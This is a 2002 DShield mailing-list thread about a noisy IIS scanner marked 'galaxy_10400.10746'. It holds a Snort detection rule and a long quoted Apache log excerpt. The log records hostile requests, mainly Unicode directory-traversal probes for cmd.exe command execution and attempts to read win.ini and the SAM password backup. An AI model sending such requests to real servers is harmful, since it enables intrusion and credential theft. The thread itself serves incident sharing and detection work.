[Dshield] (new?) IIS 'galaxy' vulnerability scanner ?

KickerRick kickerrick at hottubforum.sytes.net
Sat Jun 8 03:51:08 GMT 2002


    Weird. Nothing in my logs. Google turned up a few tools, but none appear
to be haX0r.
    Added to snort;
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 $HTTP_PORTS (msg:"WEB-IIS
Galaxy- [fwd to list at dshield.org] access";flags:A+;
uricontent:"/galaxy_10400.10746"; nocase;
reference:20020607210148.32b65ff8.jullrich at sans.org;
classtype:web-application-attack;)
See what it comes up with.

----- Original Message -----
From: "Johannes Ullrich" <jullrich at sans.org>
To: <list at dshield.org>
Sent: Friday, June 07, 2002 6:01 PM
Subject: [Dshield] (new?) IIS 'galaxy' vulnerability scanner ?


>
> I had today three people notify me about a new, rather noisy, signature
> they found in their apache logs. Can everyone take a look at their logs
> and see if they find it? I don't think this qualifies as a 'worm' so far.
> It looks a bit too complex and overly redundant. But maybe it is some
> vulnerability scanner.
>
> Note the first Line: 'galaxy_10400.10746'. It looks like a marker someone
> added to the tool.
>
>
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "GET /galaxy_10400.10746
> HTTP/1.0" 404 289 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD
> /_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD
> /_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD
> /_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD
> /_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD
> /_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD
> /_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD
> /_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD
> /_mem_bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD
> /_mem_bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD
> /_mem_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD
> /_mem_bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:00 +0200] "HEAD
> /_mem_bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:00 +0200] "HEAD
> /_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:00 +0200] "HEAD
> /_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:00 +0200] "HEAD
> /_vti_bin/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:00 +0200] "HEAD
> /_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:00 +0200] "HEAD
> /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:00 +0200] "HEAD
> /_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:00 +0200] "HEAD
> /_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:00 +0200] "HEAD
> /_vti_bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:00 +0200] "HEAD
> /_vti_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:00 +0200] "HEAD
> /_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:00 +0200] "HEAD
> /_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:00 +0200] "HEAD
> /_vti_bin/..%c1%9f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:00 +0200] "HEAD
> /_vti_bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:00 +0200] "HEAD
> /_vti_bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:00 +0200] "HEAD
> /_vti_cnf/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:00 +0200] "HEAD
> /_vti_bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:00 +0200] "HEAD
> /_vti_bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:00 +0200] "HEAD
> /_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:01 +0200] "HEAD
> /_vti_cnf/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:01 +0200] "HEAD
> /_vti_cnf/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:01 +0200] "HEAD
> /_vti_cnf/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:01 +0200] "HEAD
> /_vti_cnf/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:01 +0200] "HEAD
> /_vti_cnf/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:01 +0200] "HEAD
> /_vti_cnf/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:01 +0200] "HEAD
> /a.asp/..%c0%2f../..%c0%2f../winnt/win.ini HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:01 +0200] "HEAD
> /a.asp/..%c0%2f../..%c0%2f..\winnt\repair\sam._ HTTP/1.0" 404 0 "-" "-"
"-"
> a.b.c.d - - [06/Jun/2002:15:11:01 +0200] "HEAD
> /a.asp/..%c0%af../..%c0%af../winnt/win.ini HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:01 +0200] "HEAD
> /a.asp/..%c0%af../..%c0%af..\winnt\repair\sam._ HTTP/1.0" 404 0 "-" "-"
"-"
> a.b.c.d - - [06/Jun/2002:15:11:01 +0200] "HEAD
> /a.asp/..%c1%1c../..%c1%1c../winnt/win.ini HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:01 +0200] "HEAD
> /a.asp/..%c1%1c../..%c1%1c..\winnt\repair\sam._ HTTP/1.0" 404 0 "-" "-"
"-"
> a.b.c.d - - [06/Jun/2002:15:11:02 +0200] "HEAD
> /a.asp/..%c1%9c../..%c1%9c../winnt/win.ini HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:02 +0200] "HEAD
> /a.asp/..%c1%9c../..%c1%9c..\winnt\repair\sam._ HTTP/1.0" 404 0 "-" "-"
"-"
> a.b.c.d - - [06/Jun/2002:15:11:02 +0200] "HEAD
> /adsamples/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:02 +0200] "HEAD
> /adsamples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:02 +0200] "HEAD
> /adsamples/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:02 +0200] "HEAD
> /adsamples/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:02 +0200] "HEAD
> /adsamples/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:02 +0200] "HEAD
> /adsamples/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:02 +0200] "HEAD
> /adsamples/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:02 +0200] "HEAD
> /adsamples/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:02 +0200] "HEAD
> /bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:02 +0200] "HEAD
> /bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
>
/bin/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /bin/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
>
/bin/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
>
/bin/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /bin/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /bin/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
>
/bin/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /cgi/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /bin/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /cgi/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /cgi/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /cgi/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /cgi/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /cgi/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /cgi/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /cgi/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 403 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /cgi-bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:03 +0200] "HEAD
> /cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /cgi-bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /cgi-bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /exchange/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /cgi-bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /exchange/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /exchange/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /exchange/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /exchange/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /exchange/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /exchange/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /exchange/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /msadc/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
"-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /msadc/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
"-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /msadc/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
"-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /msadc/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:04 +0200] "HEAD
> /msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /PBServer/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /msadc/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /PBServer/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /msadc/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /msadc/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /PBServer/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /msadc/..%c1%9f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
"-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /Rpc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /PBServer/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /Rpc/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /PBServer/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /samples/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /samples/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /script/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /PBServer/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /Rpc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /PBServer/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /PBServer/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /samples/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /Rpc/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /Rpc/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /Rpc/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:05 +0200] "HEAD
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:06 +0200] "HEAD
> /Rpc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
